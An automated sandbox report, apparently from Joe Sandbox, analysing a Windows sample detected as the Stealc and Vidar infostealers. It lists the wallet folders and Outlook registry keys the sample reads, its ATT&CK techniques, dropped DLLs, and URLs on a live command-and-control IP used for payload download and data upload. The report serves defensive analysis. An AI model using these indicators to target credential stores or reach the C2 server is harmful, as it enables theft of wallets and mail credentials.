Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2151981046.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	45%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpata	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpX%	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdlld	file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37	file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllP	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phprowser	file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/N?	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll563c6670f193.php	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll4	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phplS	file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php4%	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll$	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll:$	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllf	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpe	file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2456512348.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2440454323.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/Q?D	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	GCGCFCBAKKFBFIECAEBA.0.dr	false		unknown
http://185.215.113.37r	file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll8	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpCl&	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllF	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.2451471654.00000000291C0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllp	file.exe, 00000000.00000002.2426216663.000000000065E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllV	file.exe, 00000000.00000002.2451471654.0000000029222000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlljo	file.exe, 00000000.00000002.2426216663.0000000000612000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpx&	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php9	file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false		unknown
https://support.mozilla.org	DAAFBAKECAEGCBFIEGDGIEGIEH.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2260004956.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, CGHDAKKJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000002.2451471654.0000000029226000.00000004.00000020.00020000.00000000.sdmp, GCGCFCBAKKFBFIECAEBA.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541120
Start date and time:	2024-10-24 13:01:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	185.215.113.16
	msqT9atzYW.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CGHDAKKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAAFBAKECAEGCBFIEGDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAAFBAKECAEGCBFIEGDGIEGIEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFBKFBGIIIDGDGCFCGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
